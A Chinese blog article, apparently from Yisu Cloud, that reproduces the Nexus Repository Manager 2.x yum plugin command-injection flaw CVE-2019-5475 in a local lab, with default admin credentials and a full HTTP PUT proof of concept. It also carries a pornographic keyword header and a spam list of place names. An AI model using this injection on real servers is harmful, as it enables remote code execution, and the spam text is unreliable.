亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Nexus2 yum插件RCE漏洞CVE-2019-5475是怎樣復現的

發布時間:2021-12-20 18:03:01 來源:億速云 閱讀:226 作者:柒染 欄目:大數據

這期內容當中小編將會給大家帶來有關Nexus2 yum插件RCE漏洞CVE-2019-5475是怎樣復現的,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

0x01 漏洞概述


最近hackerone才公開了Nexus Repository Manager 2.X漏洞細節,該漏洞默認存在部署權限賬號,成功登錄后可使用“createrepo”或“mergerepo”自定義配置,可觸發遠程命令執行漏洞

0x02 影響版本


Nexus Repository Manager OSS <= 2.14.13 

Nexus Repository Manager Pro <= 2.14.13

限制:admin權限才可觸發漏洞

0x03 環境搭建


Nexus-2.14.13下載地址:

https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip

Windows搭建:

解壓后進入相應版本目錄

Nexus2 yum插件RCE漏洞CVE-2019-5475是怎樣復現的

分別右擊以下文件使用管理員權限運行:

install-nexus.bat

start-nexus.bat

訪問 localhost:8081/nexus 驗證服務是否真的開啟

若訪問成功,則服務啟動成功

若失敗,按下面鏈接改配置文件wrapper.conf即可

https://blog.csdn.net/nthack5730/article/details/51082270

0x04 漏洞利用


首先以管理員身份(admin/admin123)登錄

然后找到漏洞位置:Capabilities - Yum:Configuration - Settings

Nexus2 yum插件RCE漏洞CVE-2019-5475是怎樣復現的

點擊 Save 抓包,更改mergerepoPath后的value值

C:\\Windows\\System32\\cmd.exe /k dir&

Nexus2 yum插件RCE漏洞CVE-2019-5475是怎樣復現的

此處使用 /k 是因為這樣命令執行完會保留進程不退出,而 /c 后執行完會退出;由于給用戶提供的命令后面加了一個 --version,所以后面要加個&,&表兩個命令同時執行,這樣就不會干擾其他命令的執行

Poc如下:

PUT /nexus/service/siesta/capabilities/00012bdb034073a3 HTTP/1.1Host: 127.0.0.1:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+jsonAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Nexus-UI: trueContent-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 241DNT: 1Connection: closeReferer: http://127.0.0.1:8081/nexus/Cookie: NXSESSIONID=105c7cb1-a307-43a3-9ff8-9770b5ae3b13
{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"111"},{"key":"mergerepoPath","value":"C:\\Windows\\System32\\cmd.exe /k dir&"}],"id":"00012bdb034073a3","notes":""}

0x05 修復方式


下載官方的修復版2.14.14-01

上述就是小編為大家分享的Nexus2 yum插件RCE漏洞CVE-2019-5475是怎樣復現的了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

吴堡县| 曲沃县| 垫江县| 赤峰市| 鸡西市| 皋兰县| 旬邑县| 资中县| 泰顺县| 定日县| 怀远县| 徐闻县| 马边| 穆棱市| 南阳市| 施秉县| 喀喇| 岚皋县| 兴义市| 临泽县| 佛教| 乌鲁木齐市| 连江县| 昆山市| 体育| 仁怀市| 桃江县| 漳州市| 青铜峡市| 儋州市| 辽中县| 岚皋县| 富锦市| 加查县| 沂南县| 曲麻莱县| 乌兰浩特市| 务川| 红安县| 龙陵县| 永济市|